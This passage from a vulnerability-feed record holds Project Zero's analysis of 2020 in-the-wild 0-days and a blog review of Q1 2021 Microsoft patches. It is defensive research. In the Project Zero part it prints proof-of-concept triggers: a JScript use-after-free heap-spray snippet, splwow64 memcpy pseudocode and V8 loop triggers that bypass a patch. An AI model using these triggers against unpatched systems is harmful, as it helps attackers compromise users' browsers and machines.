Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a < 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. 
The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.\n\nThe execution path for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty && mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020. \n\nFor 1507180 the execution path was the same as for CVE-2020-6820 except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild.
As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). 
\n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. 
\n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. 
\n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize <= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). 
[The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.\n\nIn November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small. 
\n\nTo patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size as shown below.\n\nif ( populate_map_and_metrics )\n\n{\n\nFT_Long size;\n\nmetrics->width = (FT_Int)imgWidth;\n\nmetrics->height = (FT_Int)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\nsize = map->rows * map->pitch; <- overflow size\n\nerror = ft_glyphslot_alloc_bitmap( slot, size );\n\nif ( error )\n\ngoto DestroyExit;\n\n} \n \n--- \n \nTo patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG. \n\nif ( populate_map_and_metrics )\n\n{\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\n+\n\nmetrics->width = (FT_UShort)imgWidth;\n\nmetrics->height = (FT_UShort)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n- /* reject too large bitmaps similarly to the rasterizer */\n\n- if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n- {\n\n- error = FT_THROW( Array_Too_Large );\n\n- goto DestroyExit;\n\n- }\n\n[...] 
\n \n--- \n \nTo summarize: \n\n * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.\n * CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.\n\nA fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow. \n\n## Apple Safari CVE-2020-27930\n\nThis vulnerability is slightly different than the rest in that while it\u2019s still a variant, it\u2019s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there\u2019s no true \u201cupstream\u201d. However when vulnerabilities were reported in Microsoft\u2019s, Apple\u2019s, or Adobe\u2019s fork, there is a possibility (though no guarantee) that it was also in the others.\n\nCVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft\u2019s implementation of Adobe\u2019s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack. \n\n[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar. 
The vulnerability this time is in the callothersubr operator in Apple\u2019s implementation of Adobe\u2019s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write. \n\nSix years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There\u2019s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.\n\n# Exploited 0-days not properly fixed\u2026 \ud83d\ude2d\n\nThree vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor. \n\nProduct\n\n| \n\nVulnerability that was exploited in-the-wild\n\n| \n\n2nd patch \n \n---|---|--- \n \nInternet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2020-0968 \n \nGoogle Chrome\n\n| \n\nCVE-2019-13764*\n\n| \n\nCVE-2020-6383 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2020-17008/CVE-2021-1648 \n \n* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild \n \n## Internet Explorer JScript CVE-2020-0674\n\nIn the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn\u2019t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020. 
We show the trigger in the section above.\n\n## Google Chrome CVE-2019-13674\n\n[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That\u2019s when he realized that the patch didn\u2019t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei\u2019s blog post, \u201c[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\u201d. \n\nTo summarize, the vulnerability is a type confusion in Chrome\u2019s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8\u2019s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8\u2019s integer type is that it is not closed under addition meaning that adding two integers doesn\u2019t always result in an integer. An example of this is +Infinity + -Infinity = NaN. \n\nTherefore, the following line is sufficient to trigger CVE-2019-13674. 
Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you\u2019re interested! \n\nfor (var i = -Infinity; i < 0; i += Infinity) { } \n \n--- \n \n[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.\n\nvar increment = -Infinity;\n\nvar k = 0;\n\n// The initial loop value is 0 and the increment is -Infinity.\n\n// This is permissible because 0 + -Infinity = -Infinity, an integer.\n\nfor (var i = 0; i < 1; i += increment) {\n\nif (i == -Infinity) {\n\n// Once the initial variable equals -Infinity (one loop through)\n\n// the increment is changed to +Infinity. -Infinity + +Infinity = NaN\n\nincrement = +Infinity;\n\n}\n\nif (++k > 10) {\n\nbreak;\n\n}\n\n} \n \n--- \n \nTo \u201crevive\u201d the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity. \n\nUnfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible \u201ctype confusions\u201d. 
Again, check out [Sergei\u2019s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you\u2019re interested in more details. \n\nThis is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it\u2019s important to work towards \u201ccorrect & comprehensive\u201d patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don\u2019t find and detect all exploited 0-days and we certainly don\u2019t find them all in a timely manner. \n\n## Windows splwow64 CVE-2020-0986\n\nThis vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only[ disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). \n\nMicrosoft\u2019s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn\u2019t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. 
This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.\n\n# Correct and comprehensive patches\n\nWe\u2019ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year. \n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes. \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. 
While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.\n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nWhile the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.\n\nIn 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you\u2019re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)\n\nIn addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. 
Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-03T00:00:00", "type": "googleprojectzero", "title": "\nD\u00e9j\u00e0 vu-lnerability\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", "CVE-2021-1648"], "modified": "2021-02-03T00:00:00", "id": "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "href": "https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-03-26T00:33:35", "description": "Hello everyone! 
It has been 3 months since [my last review of Microsoft vulnerabilities for Q4 2020](<https://avleonov.com/2021/01/11/vulristics-vulnerability-score-automated-data-collection-and-microsoft-patch-tuesdays-q4-2020/>). In this episode I want to review the Microsoft vulnerabilities for the first quarter of 2021. There will be 4 parts: January, February, March and the vulnerabilities that were released between the Patch Tuesdays.\n\n\n\nI will be using the reports that I created with my [Vulristics tool](<https://github.com/leonov-av/vulristics>). This time I'll try to make the episodes shorter. I will describe only the most critical vulnerabilities. Links to the full reports are at the bottom of the blog post.\n\n## January 2021\n\n * All vulnerabilities: 83\n * Urgent: 0\n * Critical: 1\n * High: 28\n * Medium: 51\n * Low: 3\n\nSo, what was interesting in January. The only critical vulnerability was Microsoft Defender Remote Code Execution (CVE-2021-1647). "Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized."\n\nThe most interesting High level vulnerability is Microsoft splwow64 Elevation of Privilege (CVE-2021-1648). "According to Maddie Stone, a researcher at Google Project Zero credited with identifying this vulnerability, CVE-2021-1648 is a patch bypass for CVE-2020-0986, which was exploited in the wild as a zero-day."\n\nAlso, vendors paid attention to a large number of Remote Procedure Call Runtime Remote Code Executions (CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701) and Windows Remote Desktop Security Feature Bypass (CVE-2021-1669). But there are still no signs of exploitation for them. They are all labeled High in the Vulristics report.\n\nThere were no public exploits for any of the January vulnerabilities. 
January was a quiet and calm month.\n\n## February 2021\n\n * All vulnerabilities: 57\n * Urgent: 1\n * Critical: 2\n * High: 21\n * Medium: 31\n * Low: 2\n\nOne Urgent level vulnerability is Elevation of Privilege in Win32k component of Windows 10 and Windows Server 2019 (CVE-2021-1732). According to Microsoft, this vulnerability has been exploited in the wild. "Successful exploitation would elevate the privileges of an attacker, potentially allowing them to create new accounts, install programs, and view, modify or delete data". Public exploit in a form of Metasploit Module is found at Vulners ([Win32k ConsoleControl Offset Confusion](<https://vulners.com/packetstorm/packetstorm:161880>)).\n\nBut the situation with other critical vulnerabilities is interesting. None of the VM vendors mentioned them in their Patch Tuesday reviews.\n\n * This is Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-24085), which is mentioned on [AttackerKB](<https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085>) and for which public exploit is found at Vulners ([Microsoft Exchange Server msExchEcpCanary CSRF / Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161528>)). This is not the same vulnerability that was exploited in HAFNIUM. We'll get to those vulnerabilities later.\n * Two other vulnerabilities, Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1698) and Microsoft Exchange Server (CVE-2021-1730), were exploited in the wild. Therefore, the Vulristics Vulnerability Score is higher for them.\n\nIf vendors ignored these vulnerabilities, what vulnerabilities did they mention in their reports? \n\n * Primarily they wrote about Windows TCP/IP Remote Code Execution Vulnerabilities. "Microsoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086).
While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact."\n * Also about Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-24078). "RCE flaw within Windows server installations when configured as a DNS server. Affecting Windows Server versions from 2008 to 2019, including server core installations, this severe flaw is considered \u201cmore likely\u201d to be exploited and received a CVSSv3 score of 9.8. This bug is exploitable by a remote attacker with no requirements for user interaction or a privileged account. As the vulnerability affects DNS servers, it is possible this flaw could be wormable and spread within a network."\n\nBut for these 2 vulnerabilities, there are still no public exploits or signs of active exploitation in the wild. This, of course, does not mean that these vulnerabilities do not need to be fixed. When we see exploitation of these vulnerabilities in the wild, it will be a disaster.\n\n## March 2021\n\n * All vulnerabilities: 82\n * Urgent: 0\n * Critical: 0\n * High: 36\n * Medium: 43\n * Low: 3\n\nAnd again, the vulnerabilities at the top are not exactly the ones that VM vendors pointed out in their reviews.\n\n * Windows Container Execution Agent Elevation of Privilege Vulnerability (CVE-2021-26891). It is at the top simply because a public exploit was found at Vulners ([Microsoft Windows Containers Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161734>)). \n * Internet Explorer Memory Corruption (CVE-2021-26411). "A memory corruption vulnerability in Internet Explorer that was exploited in the wild as a zero-day. In order to exploit the flaw, an attacker would need to host the exploit code on a malicious website and convince a user through social engineering tactics to visit the page, or the attacker could inject the malicious payload into a legitimate website". 
Exploitation in the wild is mentioned at [AttackerKB](<https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411>).\n\nBut we also see several Windows DNS Server Remote Code Executions . "All five of these CVEs were assigned 9.8 CVSSv3 scores and can be exploited by an unauthenticated attacker when dynamic updates are enabled. According to an analysis by researchers at McAfee, these CVEs are not considered \u201cwormable,\u201d yet they do evoke memories of CVE-2020-1350 (SIGRed), a 17-year-old wormable flaw patched in July 2020." In general, updating DNS Server is never a bad thing.\n\nAnd where is the most important thing? Naturally these are Exchange vulnerabilities and they were published between Patch Tuesdays. I made a special script to get such CVEs.\n\n## Other Q1 2021\n\n * All vulnerabilities: 85\n * Urgent: 0\n * Critical: 7\n * High: 5\n * Medium: 27\n * Low: 46\n\nThe 7 critical vulnerabilities are those Microsoft Exchange Server Remote Code Executions exploited in recent attacks. They have signs of exploitation in the wild at [AttackerKB](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855>) and [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). However, we still don't see public exploits.\n\n"[ProxyLogon](<https://proxylogon.com/>) is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution. All affected components are vulnerable by default! As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an only opened 443 port!"\n\nEverything is extremely serious with these vulnerabilities and if you have public unpatched Exchange servers, then there is a good chance that you have already been hacked. 
